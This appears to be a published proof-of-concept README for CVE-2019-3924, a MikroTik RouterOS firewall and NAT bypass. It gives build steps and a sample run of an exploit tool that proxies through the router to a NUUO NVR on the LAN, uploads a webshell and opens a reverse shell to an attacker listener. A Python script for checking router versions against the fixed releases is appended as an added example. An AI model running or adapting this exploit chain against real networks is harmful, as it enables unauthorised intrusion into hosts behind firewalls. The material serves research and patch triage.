MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass


# CVE-2019-3924

A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN. A video demonstrating the attack can be found here:

* https://www.youtube.com/watch?v=CxyOtsNVgFg

A Tenable Research Advisory for the vulnerability can be found here:

* https://www.tenable.com/security/research/tra-2019-07

## Compilation
This code was tested on Ubuntu 18.04. There is a dependency on boost, gtest, and cmake. Simply install them like so:

```sh
sudo apt install libboost-dev cmake
```

To compile simply do the following:

```sh
cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..
make
```

## Sample Usage

```sh
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip --proxy_port 8291 --target_ip --target_port 80 --listening_ip --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at
[+] Connected!
[+] Looking for a NUUO NVR at
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to
[+] Done!
```

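For triaging a fleet against the fixed releases named in the title (6.43.12 stable, 6.42.12 long-term), the following is an added example, not part of the original post or the PoC. The inventory rows, function names and the "review" status are assumptions made for illustration; versions are compared numerically so that 6.42.9 sorts below 6.42.12.

```python
import re

# Fixed releases, taken from the advisory title on this page.
FIXED = {"stable": (6, 43, 12), "long-term": (6, 42, 12)}

_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")


def parse_version(text):
    """Return (major, minor, patch) for a release like '6.43.12' or '6.43'.

    Pre-release builds ('6.44beta75', '6.43rc4') return None: the page gives
    no fixed version for them, so they need a manual look.
    """
    m = _VERSION.match(text.strip())
    if not m:
        return None
    return tuple(int(p) if p else 0 for p in m.groups())


def triage(version, channel):
    """Classify one router as 'vulnerable', 'fixed' or 'review'."""
    parsed = parse_version(version)
    fixed = FIXED.get(channel.strip().lower())
    if parsed is None or fixed is None:
        return "review"
    return "vulnerable" if parsed < fixed else "fixed"


# Constructed inventory rows: name, reported version, release channel.
INVENTORY = [
    ("edge-01", "6.43.11", "stable"),
    ("edge-02", "6.43.12", "stable"),
    ("branch-07", "6.42.9", "long-term"),
    ("branch-08", "6.42.12", "long-term"),
    ("lab-01", "6.44beta75", "testing"),
    ("core-01", "6.43", "stable"),
]


def report(rows=INVENTORY):
    """Return {name: status} for every inventory row."""
    return {name: triage(ver, chan) for name, ver, chan in rows}


if __name__ == "__main__":
    for name, status in report().items():
        print(f"{name:10} {status}")
```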
